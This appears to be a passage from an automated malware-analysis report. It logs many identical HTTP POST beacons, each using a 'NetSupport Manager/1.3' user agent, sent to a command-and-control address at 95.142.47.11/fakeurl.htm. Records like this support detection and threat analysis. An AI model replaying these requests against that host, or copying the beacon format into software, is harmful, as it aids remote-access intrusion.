                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.442969084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.648021936 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.750911951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.852133989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:00.953166962 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.053980112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.153928995 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.254070997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.353986979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.458447933 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.559094906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.659969091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.763452053 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.863884926 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:01.964164019 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:02.065082073 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:02.165946960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:02.567975998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:02.993076086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.293968916 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.393834114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.493881941 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.594845057 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.695854902 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.796904087 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.897911072 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:03.998851061 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.100048065 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.199861050 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.300836086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.401027918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.501892090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.601912022 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.703504086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.802870989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:04.903909922 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.007548094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.107017040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.207983971 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.308887005 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.409837008 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.509850979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.610910892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.711028099 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.811994076 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:05.912966967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.012959003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.113883972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.213916063 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.315037012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.414870024 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.515897989 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.617048979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.717870951 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.817882061 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:06.919169903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.019881964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.119874954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.222240925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.322925091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.422852039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.523899078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.624877930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.724867105 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.824862003 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:07.970273972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:08.989841938 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.090861082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.190922976 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.290858030 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:09.391879082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
